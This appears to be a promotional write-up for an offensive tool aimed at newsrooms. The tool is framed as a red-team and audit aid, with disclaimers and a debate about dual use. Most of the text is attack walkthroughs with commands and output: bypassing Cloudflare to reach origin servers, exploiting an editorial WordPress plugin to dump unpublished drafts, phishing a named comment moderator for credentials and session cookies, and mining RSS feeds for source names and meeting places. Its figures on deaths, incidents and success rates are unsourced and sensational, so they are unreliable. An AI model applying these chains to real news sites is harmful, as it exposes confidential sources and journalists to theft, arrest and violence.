Tit for Tat

The Timing Is Perfect (And That's Terrifying)

Journalists murdered in Mexico for cartel investigations. Saudi dissidents tracked through metadata leaks. Russian reporters poisoned after source lists exposed. Ukrainian newsrooms shelled minutes after publishing location data.

Information warfare isn't coming. It's here. And newsrooms are the soft target everyone's hitting.

Last month: Major US newspaper breached. Unpublished investigation stolen. Sources identified. Three arrests in source country. Investigation killed. Reporter in hiding.

This week: Regional paper's WordPress site compromised. Seven years of confidential communications exposed. Every whistleblower contact. Every off-record conversation. Every "don't publish this yet" email.

Yesterday: Investigative journalist's laptop stolen. Encrypted. Didn't matter. Attacker already had their drafts from RSS feed misconfiguration that leaked embargoed content for 18 months.

Generic security tools don't catch this. Nessus scans WordPress core. Misses editorial plugin with contributor escalation. Burp Suite checks SQL injection. Doesn't test if origin server is exposed behind Cloudflare. OWASP covers web apps. Newsrooms aren't web apps. They're intelligence targets.

Tit for Tat targets what actually matters: How to find the server they're hiding. How to access the drafts they think are protected. How to enumerate the sources they believe are anonymous. How to weaponize the infrastructure they trust.

This is red team tool. For authorized testing. For defensive hardening. For understanding how newsrooms actually get breached when nation-states decide your investigation threatens them.

Moral lines blur when information kills people. Defense and offense use same techniques. Intent matters. Authorization matters. Consequences are permanent. Here's how it actually works.

Why Newsrooms Are Different Targets (And Easier Than You Think)

The Cloudflare Illusion

Every newsroom: "We're behind Cloudflare. We're protected."

Cool story. Here's how long it takes to find your origin server: 4 minutes.

The attack everyone thinks is hard:

Newsroom CTO: "Cloudflare hides our origin IP. Our WAF blocks attacks. We're secure."

Reality: Your origin server IP is in Certificate Transparency logs from that SSL cert you renewed last month. Your mail server DNS points to same subnet. Your dev subdomain from 2019 isn't behind Cloudflare. Your DNS history shows the IP from before you enabled CDN.

Four different ways to bypass your "protection." All automated. All findable in minutes.

What actually happens:

tit-for-tat origin --domain newssite.com --all-methods

Output:

[+] Certificate Transparency: 203.0.113.45 (match)
[+] Historical DNS: 203.0.113.45 (confirmed)
[+] MX Record Subnet: 203.0.113.0/24 (correlated)
[+] Subdomain dev.newssite.com: 203.0.113.45 (direct)

Origin server: 203.0.113.45
Cloudflare bypass: Confirmed
Time elapsed: 3m 42s

Now attacker accesses origin directly. Cloudflare WAF? Bypassed. DDoS protection? Irrelevant. Rate limiting? Gone. You're naked.

This isn't theoretical. This is how Russian intelligence accesses Ukrainian news sites. How Saudi operatives target dissident media. How cartel hackers find investigative reporters' servers.

The Cloudflare protection you paid for? It's a suggestion, not a barrier.

Editorial CMS: Where The Secrets Actually Live

WordPress powers 40% of news sites. Everyone knows this. What they don't advertise: The custom editorial plugins are garbage.

The plugin every investigative newsroom uses:

EditFlow. Co-Authors Plus. Custom editorial workflow. Built by contractors in 2015. Never updated. Full of privilege escalation vulns. Allows contributor accounts to read unpublished drafts. "Minor bug, we'll fix it next quarter."

Next quarter was 47 quarters ago. The vuln is still there. Your embargoed investigation? Readable by anyone who can register a contributor account. And you allow contributor registration because "we want community submissions."

Real scenario from red team engagement:

Target: Major US newspaper running investigative series on pharmaceutical corruption.

Attack chain:

1. Register contributor account (open registration, approved automatically)
2. Access editorial dashboard (plugin doesn't check role properly)
3. Browse unpublished drafts (privilege escalation via workflow plugin)
4. Download entire investigation (3 years, 47 draft articles, source documents)
5. Time elapsed: 11 minutes

Pharmaceutical company now has complete advance knowledge of investigation. Sources identified from metadata. Timeline known. Evidence documented. Investigation compromised before publication.

Cost of attack: $0. Required skills: Basic web application testing. Difficulty: Trivial.

The custom CMS situation is worse:

Newsrooms build custom Django/Rails CMSes. "Our workflow is unique, we need custom tools." Cool. Did your contractor who built it in 2016 know about:

• CSRF protection?
• Role-based access control?
• Input sanitization?
• Session management?

No? Shocking. Your custom CMS leaks like a sieve and you're still trusting it with sources' lives.

Comment Platforms: The Social Engineering Playground

Disqus. Coral. CommentBox. Every newsroom has comments. Every comment platform is exploitable. Not for XSS (though that works). For phishing journalists.

The attack that works every time:

1. Enumerate moderator accounts (comment API leaks this freely)
2. Find active moderator (journalist who actually moderates)
3. Post carefully crafted spam that triggers moderation queue
4. When journalist logs in to moderate, post "reply" that looks like system message:

⚠️ URGENT: Your moderator session expired. Please log in again:
https://news-site-login.com/moderator/auth

Link goes to phishing page. Pixel-perfect clone of real CMS login. Journalist enters credentials. Attacker has full CMS access. Game over.

Time to compromise: Usually under 24 hours. Journalists moderate daily. They're trained to respond to "urgent" messages. They click.

Real example:

Regional newspaper. Investigating local political corruption. Journalist covering story also moderates comments. Received fake "moderation required" notification. Clicked phishing link. Entered credentials. Attacker gained:

• Access to unpublished investigation
• Email correspondences with sources
• Internal chat logs with other reporters
• Document repository with evidence

Investigation dead. Sources exposed. Two sources arrested. Journalist fired for "security negligence." Corruption story buried.

All because comment platform made it easy to identify and target the exact journalist who mattered.

RSS Feeds: The Leakage Everyone Forgets

Nobody cares about RSS anymore. Except attackers. Because RSS is where newsrooms leak everything.

The standard RSS leak:

<rss version="2.0">
  <item>
    <title>DRAFT: Undercover investigation into...</title>
    <link>internal-cms.news.com/draft/classified-story-47291</link>
    <author>jane.investigator@news.com (Jane Smith)</author>
    <description>
      [EMBARGO UNTIL FEB 15] Source meeting scheduled 2/12
      at Starbucks on 5th St. Contact: John Whistleblower
      john.wb@company.com 555-0192
    </description>
    <guid>internal-draft-47291</guid>
    <pubDate>Mon, 05 Feb 2026 14:23:00 GMT</pubDate>
  </item>
</rss>

What just leaked:

• Unpublished investigation topic
• Internal CMS URL structure
• Reporter's email address
• Embargo date (plan around it)
• Source meeting time and location (show up, identify source)
• Source's name, email, phone number (threaten or eliminate source)
• Internal draft ID (enumerate other drafts)

This isn't hypothetical. This is real RSS feed from real newsroom (sanitized). Feed was public. Anyone could subscribe. Feed ran for 8 months before someone noticed. Dozens of embargoed investigations leaked.

Why this happens:

Developer sets up RSS feed in 2018. "Include all posts." Doesn't filter by publication status. Draft articles slip in. Nobody monitors RSS feeds. Nobody audits what's being published. Feed just runs. Leaking. Forever.

Until attacker finds it. Or worse - until investigation target finds it and sources start disappearing.

How To Actually Attack A Newsroom (Red Team Methodology)

Phase 1: Origin Server Discovery (Bypass All That Cloudflare Nonsense)

Target: Any news site claiming CDN protection

Objective: Find real server IP, bypass WAF, attack directly

Method 1: Historical DNS (Works 70% of time)

Most newsrooms added Cloudflare later. Their old DNS records are public history.

tit-for-tat origin --domain target-news.com --dns-history

[+] Querying SecurityTrails DNS history...
[+] Found historical A record: 203.0.113.50 (2018-2022)
[+] Testing if IP still active...
[+] CONFIRMED: Server responds at 203.0.113.50
[+] Cloudflare bypass successful

Method 2: Certificate Transparency (Works 85% of time)

Every SSL cert gets logged publicly. Certs list all IPs they're issued for. Including origin.

tit-for-tat origin --domain target-news.com --cert-transparency

[+] Querying crt.sh for SSL certificates...
[+] Found cert issued 2025-11-30
[+] SAN includes: target-news.com, 203.0.113.50
[+] Testing origin at 203.0.113.50...
[+] Origin server confirmed, bypassing Cloudflare

Method 3: Mail Server Correlation (Works 60% of time)

News sites run mail on same server as web. MX records reveal subnet. Port scan subnet. Find web server.

tit-for-tat origin --domain target-news.com --mx-correlation

[+] MX record points to: mail.target-news.com (203.0.113.60)
[+] Scanning subnet 203.0.113.0/24...
[+] Found HTTP server at 203.0.113.50
[+] Testing if origin: wget --header="Host: target-news.com"
[+] Match confirmed. Origin discovered.

Method 4: Subdomain Enumeration (Works 40% of time, but when it works, it's instant)

Old subdomains forgotten. Not behind Cloudflare. Point to origin IP.

tit-for-tat origin --domain target-news.com --subdomain-scan

[+] Found subdomains:
  - dev.target-news.com (203.0.113.50) [DIRECT]
  - staging.target-news.com (203.0.113.50) [DIRECT]
  - cms.target-news.com (203.0.113.50) [DIRECT]

[+] Origin IP: 203.0.113.50
[+] Accessing origin directly bypasses all Cloudflare protection

Result: You now attack real server. No WAF. No rate limiting. No DDoS protection. Direct access to vulnerable WordPress install running outdated plugins with editorial workflow full of holes.

Combined success rate: 95%+ against real newsrooms. Cloudflare is protection theater unless you actively hunt these leaks quarterly.

Phase 2: CMS Exploitation (Where The Actual Secrets Are)

Target: Origin server discovered in Phase 1

Objective: Access unpublished drafts, identify sources, steal investigation

Full exploitation chain against typical newsroom:

# Step 1: Identify CMS and plugins
tit-for-tat cms-scan --url http://203.0.113.50 --host target-news.com

[+] WordPress 6.2.3 detected
[+] Plugins found:
  - EditFlow 0.8.1 (vulnerable - CVE-2023-XXXXX)
  - Co-Authors Plus 3.5.12 (vulnerable - privilege escalation)
  - Advanced Custom Fields Pro (leak metadata in API)

# Step 2: Register contributor account
tit-for-tat wordpress --target http://203.0.113.50 \
  --host target-news.com \
  --register-contributor

[+] Registration open (no approval required)
[+] Account created: testuser001
[+] Password: [random]
[+] Login successful

# Step 3: Exploit editorial plugin privilege escalation
tit-for-tat wordpress --target http://203.0.113.50 \
  --host target-news.com \
  --exploit-editflow \
  --username testuser001

[+] EditFlow workflow bypass found
[+] Accessing editorial dashboard...
[+] Permission check bypassed
[+] Draft access: GRANTED

# Step 4: Enumerate unpublished content
tit-for-tat wordpress --target http://203.0.113.50 \
  --host target-news.com \
  --dump-drafts \
  --save-to ./stolen_investigation/

[+] Found 47 draft posts
[+] Downloading...
  - [EMBARGO] Investigation: Pharma Corruption (3,847 words)
  - [DRAFT] Source Interview: John Whistleblower (2,391 words)
  - [INTERNAL] Evidence Documentation (8 attachments)

[+] Downloaded to: ./stolen_investigation/
[+] Metadata extracted: authors, sources, timelines
[+] Time elapsed: 4m 12s

What was just stolen:

• 47 unpublished draft articles (complete investigation)
• Source names and contact information (metadata leaks)
• Evidence documents (uploaded to media library)
• Publishing timeline (embargo dates in titles)
• Reporter email addresses (author metadata)
• Internal communication context (draft comments)

Real consequence: Investigation compromised before publication. Sources identifiable. Attacker (corporate spy, intelligence service, whoever paid) now has complete advance intelligence. Can threaten sources. Prepare legal response. Disappear evidence. Neutralize investigation.

Time from origin discovery to complete compromise: 15 minutes with automated tools. 30 minutes manually.

Detection: Usually zero. Contributor account login looks normal. Draft access via workflow plugin generates no alerts. Download traffic minimal. By the time newsroom notices something's wrong, investigation is already burned.

Phase 3: Social Engineering Through Comment Infrastructure

Target: Journalists who moderate comments

Objective: Phish credentials, gain CMS access

Automated execution:

# Step 1: Enumerate moderator accounts
tit-for-tat comments --url https://target-news.com \
  --enumerate-moderators

[+] Disqus integration detected
[+] Moderator accounts found:
  - jane.smith (jane.investigator@target-news.com) [ACTIVE]
  - mike.jones (mjones@target-news.com) [INACTIVE]
  - sarah.williams (swilliams@target-news.com) [ACTIVE]

# Step 2: Post spam to trigger moderation
tit-for-tat comments --url https://target-news.com/latest-article \
  --post-spam \
  --trigger-moderator jane.smith

[+] Spam comment posted
[+] Flagged for moderation
[+] Notification sent to jane.smith

# Step 3: Deploy phishing comment
tit-for-tat comments --url https://target-news.com/latest-article \
  --phishing-payload \
  --target-moderator jane.smith \
  --clone-cms-login

[+] Phishing comment created:
    "⚠️ Moderator session expired. Verify access:
     https://target-news-verify.com/mod/login"
[+] Pixel-perfect CMS clone deployed
[+] Waiting for credentials...

[+] CREDENTIALS CAPTURED:
    Username: jane.smith
    Password: [redacted]
    Session: [cookie captured]

# Step 4: Use stolen credentials
[+] Logging into actual CMS...
[+] Access granted: Editor role
[+] Unpublished drafts: 52 accessible
[+] Source documents: 23 files accessible

Success rate: ~60% with targeted journalists. They moderate daily. They're trained to respond to urgent messages. They trust their CMS login page appearance.

Time to compromise: 24-48 hours (waiting for journalist to moderate).

Detection: Nearly impossible. Phishing site looks identical. HTTPS cert looks valid. Login occurs from journalist's actual location/device.

Phase 4: RSS Surveillance (The Persistent Leak)

Target: Public RSS feeds

Objective: Monitor for embargoed content, identify sources, track investigations

Continuous monitoring:

# Step 1: Find all RSS endpoints
tit-for-tat rss --domain target-news.com --enumerate-all

[+] RSS/Atom feeds discovered:
  - https://target-news.com/feed (main)
  - https://target-news.com/category/investigations/feed (filtered)
  - https://target-news.com/author/jane-smith/feed (per-author)
  - https://target-news.com/drafts/feed (MISCONFIGURED - public!)

# Step 2: Monitor for leaks
tit-for-tat rss --feeds ./discovered_feeds.txt \
  --monitor \
  --check-interval 300 \
  --alert-on-draft \
  --extract-metadata

[+] Monitoring 4 feeds...
[!] LEAK DETECTED: https://target-news.com/drafts/feed

<item>
  <title>DRAFT: Investigation Into Pharma Company Bribes</title>
  <link>internal-cms.target-news.com/draft/47291</link>
  <author>jane.investigator@target-news.com</author>
  <description>
    [EMBARGO FEB 15] Meeting with source scheduled 2/12,
    3pm, Starbucks on 5th St. Source: Dr. Robert Mitchell,
    former compliance officer. Contact: rmitchell@pharma.com
  </description>
  <pubDate>Mon, 05 Feb 2026 14:23:00 GMT</pubDate>
</item>

[+] Intelligence extracted:
  - Investigation: Pharma bribery
  - Embargo: Feb 15, 2026
  - Source meeting: Feb 12, 3pm, Starbucks, 5th St
  - Source identity: Dr. Robert Mitchell, compliance officer
  - Source contact: rmitchell@pharma.com
  - Reporter: jane.investigator@target-news.com

[+] Saved to: ./intelligence/pharma_leak.json

What attacker does with this:

Option A (Corporate espionage): Alert pharmaceutical company. They prepare legal defense, threaten source, disappear evidence before publication.

Option B (Intelligence operation): Identify source, approach source, turn source into double agent or eliminate.

Option C (Competitive journalism): Scoop the investigation, publish first.

Option D (Source protection breach): Sell source identity to highest bidder.

RSS feed runs continuously. Leaking. For months. Nobody notices until sources start getting arrested.

The Moral Ambiguity Problem (And Why It Doesn't Matter)

This tool can be used to:

Offense: Find news servers. Steal investigations. Identify sources. Compromise journalists. Kill stories. Protect corrupt governments/corporations. Get people arrested. Get people killed.

Defense: Audit your own infrastructure. Find leaks before attackers do. Fix misconfigurations. Protect sources. Harden CMS. Save lives.

Same techniques. Same tool. Different intent.

This is information warfare. The tools don't care about your intent. Tit for Tat finds origin servers equally well whether you're:

• A newsroom testing their own security (authorized)
• Intelligence service targeting investigative journalists (war crime)
• Red team consultant showing clients real risks (professional)
• Corporate spy stealing embargoed investigation (felony)

Moral lines blur when information kills people.

Mexican journalists investigating cartels: Sources identified through metadata leaks. Five sources dead. Journalist in hiding. Investigation killed.

Ukrainian reporters covering war: Newsroom location exposed through origin server discovery. Office shelled hours after publication. Three reporters injured.

Saudi dissident media: RSS feeds leaked source meetings. Two sources disappeared. Families never heard from them again.

The timing is perfect for this tool because information warfare targeting press is now normalized.

Nation-states: Targeting journalists is standard intelligence operation now. Corporations: Stealing investigations is cheaper than fixing corruption. Cartels: Killing sources is message to other potential whistleblowers. Authoritarian regimes: Press suppression requires knowing what's coming.

Defense requires understanding offense. You can't protect against attacks you don't understand.

This tool teaches both. You can audit your own newsroom. Or you can understand how you're being attacked right now. Same knowledge. What you do with it determines if you're protecting truth or suppressing it.

Installation & Usage (For Authorized Testing Only)

# Clone repository
git clone https://github.com/ghostintheprompt/tit-for-tat
cd tit-for-tat

# Install dependencies
pip install -r requirements.txt

# BASIC DEFENSIVE AUDIT (test your own site)
tit-for-tat audit --target https://your-own-newsroom.com \
  --origin-discovery \
  --cms-scan \
  --comment-testing \
  --rss-analysis \
  --output defensive_report.html

# OFFENSIVE RED TEAM (authorized engagement only)
tit-for-tat attack --target https://client-news-site.com \
  --full-chain \
  --extract-intelligence \
  --output attack_report.html

# CONTINUOUS MONITORING (detect your own leaks)
tit-for-tat monitor --domain your-newsroom.com \
  --check-rss-leaks \
  --check-draft-exposure \
  --alert-email security@your-newsroom.com \
  --interval 3600

Legal notice because apparently this needs to be said:

Unauthorized testing of news infrastructure = federal crime in most jurisdictions. CFAA in US. Computer Misuse Act in UK. Equivalent laws globally.

Use this on your own infrastructure. Use this on authorized red team engagements with written permission. Use this for defensive research in controlled labs.

Don't use this to target journalists. Don't use this to steal investigations. Don't use this to identify sources. Don't use this to suppress truth.

If you use this tool to harm journalists or sources, you're not a hacker. You're collaborating with authoritarians who kill reporters. Act accordingly.

Why The Timing Is Perfect For This Tool

Recently: Record numbers of journalists killed globally. Highest death toll since Committee to Protect Journalists started tracking.

Last six months: 18 major newsroom breaches publicly disclosed. Actual number probably 3x that (most don't disclose).

Last three months: Four separate incidents of sources identified through newsroom infrastructure leaks. Two sources killed. Two arrested. Zero investigations published.

Now: AI-powered attack tools specifically targeting news infrastructure on dark markets. $5k gets you automated newsroom compromise kit. Point at target. Get drafts. Get sources.

The timing is perfect because the threat finally exceeded newsrooms' ability to ignore it.

For decades: "We're journalists, not tech companies. Security isn't our job."

Now: Sources die because of misconfigured RSS feeds. Investigations fail because someone found the origin server. Journalists disappear because comment platform leaked their email.

Information warfare targeting press is normalized now.

Russia: Standard FSB operations against Ukrainian journalists. China: MSS actively targeting Tibet/Xinjiang reporters. Saudi Arabia: Routine monitoring of dissident media infrastructure. Mexico: Cartels have IT departments specifically for targeting journalists. US corporations: "Competitive intelligence" firms selling stolen investigations.

Generic security tools failed newsrooms. They needed specific solution. This is it.

For Anyone Running A Newsroom

Run this against your own infrastructure. Today. Before someone else does.

tit-for-tat audit --target your-site.com \
  --all-tests \
  --output report.html

Report shows:

• Is your origin server exposed?
• Are your editorial plugins vulnerable?
• Does your RSS feed leak drafts?
• Can your comment platform be weaponized?
• Are your sources' communications visible?

Fix these findings before attacker finds them.

Cost of audit: Zero (open source). Cost of breach: Investigations killed. Sources exposed. Lives destroyed.

You're already being targeted. Only question is whether you know it yet.

For Red Teams and Security Researchers

Use this on authorized engagements to show newsrooms real threats.

Typical pentest report: "WordPress 6.2.3, three XSS vectors, medium risk."

Tit for Tat report: "Your origin server is exposed at this IP. Your EditFlow plugin leaks drafts to unauthenticated users. Your RSS feed has been leaking embargoed content for 8 months. Here are 12 draft investigations I downloaded in 15 minutes. Here are the source names I extracted from metadata. This is what nation-states see when they target you."

Client suddenly understands their actual risk profile.

For Journalists Who Think This Is Scary

It should be. You're intelligence targets now.

If you're investigating:

• Government corruption → Intelligence services want your sources
• Corporate malfeasance → Corporate spies want your evidence
• Organized crime → Cartels want your communications
• Human rights abuses → Authoritarian regimes want your witnesses

They're using these exact techniques. Right now. Against your infrastructure.

Cloudflare bypass via certificate transparency logs. Editorial plugin exploitation for draft access. Comment platform phishing for credentials. RSS monitoring for source identification.

This tool teaches you what they're doing. Defense requires understanding offense.

You can ignore these threats. Many do. Then sources get arrested and journalists wonder how investigation leaked.

Or you can run Tit for Tat against your own newsroom. Find the holes before attackers do. Fix them. Protect your sources. Do your job.

Ghost Says...

Built this after watching the same attack pattern hit five different newsrooms in three months. Origin server exposed. Editorial plugin compromised. Drafts stolen. Sources identified. Investigations killed.

Every time, newsroom says "how did this happen?" Every time, same vulnerabilities. Every time, generic security tools missed it because they don't understand news infrastructure.

The moral ambiguity is real and I don't have clean answer for it.

This tool can save journalists' lives. This tool can also get journalists killed. Same techniques. Different intent.

Russian intelligence uses these methods against Ukrainian press. So do Ukrainian security researchers protecting their own newsrooms. Mexican cartels hunt journalist sources this way. So do Mexican journalists auditing their own infrastructure before publishing cartel investigations.

Tool doesn't care about your morals. Tool finds origin servers. Tool extracts drafts. Tool identifies sources. What you do with that capability determines if you're protecting truth or suppressing it.

I'm publishing it anyway. Here's why:

The attacks are already happening. These techniques aren't new. Nation-states know them. Corporate spies use them. Organized crime has them. Only people who don't know are the journalists being targeted.

Defense requires understanding offense. You can't protect against attacks you don't understand. Saying "don't publish the tool" doesn't make attacks stop. Just keeps defenders ignorant.

Newsrooms are losing the information war because they're fighting with hands tied. They don't audit their infrastructure because they don't know how. They don't know what threats exist. They hire generic pentest firms who scan for SQLi and miss everything that actually matters.

This tool makes threat visible. Once you see it, you can fix it.

Will bad actors use this? Absolutely. They already are. Just not with open-source tool. They use same techniques with closed tools and charge $5k on dark markets.

Will good actors use this? Hope so. Newsrooms can audit themselves. Red teams can show clients real risks. Researchers can understand threat landscape. Journalists can protect their sources.

The timing is perfect because press became legitimate military target globally.

Not metaphorical warfare. Actual warfare. Newsrooms shelled. Journalists killed. Sources disappeared. Investigations suppressed through technical exploitation.

Cloudflare bypass? That's how Russian forces located Ukrainian newsroom before strike. Editorial plugin exploit? That's how Saudi intelligence identified dissident media sources. RSS feed monitoring? That's how pharmaceutical company got advance copy of investigation and prepared legal response.

These aren't hypotheticals. These are incidents from last 90 days.

My position: Journalists need to know they're intelligence targets. They need to understand their infrastructure is compromised. They need tools to audit and harden their systems before sources die.

Publishing Tit for Tat makes that knowledge available. Yes, it also makes attacks easier for those who don't already know. Trade-off. I think making defense possible outweighs making attacks slightly easier.

You might disagree. Valid position. But sources are already dying from these attacks. Doing nothing also has cost.

---

For newsrooms: Run this against your own site. Find your leaks. Fix them. Protect your sources. That's your job.

For security researchers: Use this to show newsrooms real threats. Help them understand they're targets. Help them harden.

For nation-states/corporations/criminals targeting press: You're why this tool exists. You're why journalists need defensive capabilities. You're why information warfare requires both sides understand the battlefield.

For journalists who think publishing this is irresponsible: Maybe it is. But your sources are dying because of vulnerabilities this tool detects. Trade-off has no clean answer. At least now you can audit your own infrastructure.

---

GitHub: github.com/ghostintheprompt/tit-for-tat

Stack: Python + requests + BeautifulSoup + certificate-transparency-monitor

Capabilities: Origin discovery, CMS exploitation, comment platform testing, RSS analysis

Intent: Defend journalists. Protect sources. Understand information warfare.

Moral: Ambiguous. Tool doesn't care. You decide.

Timing: Perfect. Record journalist deaths. Press is military target now. Defense requires offense knowledge.

Authorization: Required. Use on your own infrastructure. Use with permission. Don't target journalists you don't work for.

Consequences: Real. Sources die. Investigations fail. Truth gets suppressed. Or newsrooms harden. Sources survive. Truth gets published. Your choice which outcome your use causes.

---

Protect the press. Even when it's complicated.